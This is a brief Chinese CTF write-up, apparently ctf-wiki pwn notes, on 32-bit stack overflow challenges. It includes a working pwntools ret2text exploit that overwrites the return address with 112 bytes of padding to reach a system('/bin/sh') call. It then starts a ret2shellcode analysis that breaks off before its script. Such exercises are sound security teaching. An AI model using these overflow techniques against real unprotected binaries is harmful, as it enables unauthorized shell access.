ctfwiki-pwn
stackoverflow
ret2text
首先checksec一下,是32位可执行文件,没有开启保护
放入ida,shift+f12查看字符串,发现secure函数中使用system函数调用了"/bin/sh",记下地址0x804863a
查看偏移地址
脚本如下:
from pwn import *
io = process("./ret2text")
payload = b"a"*112 + p32(0x804863a)
io.sendline(payload)
io.interactive()
ret2shellcode
checksec一下,是32位小端序
IDA看一下汇编代码,发现没有shell
找到溢出点
buf2所在段有执行权限
分析偏移地址:112
构造脚本: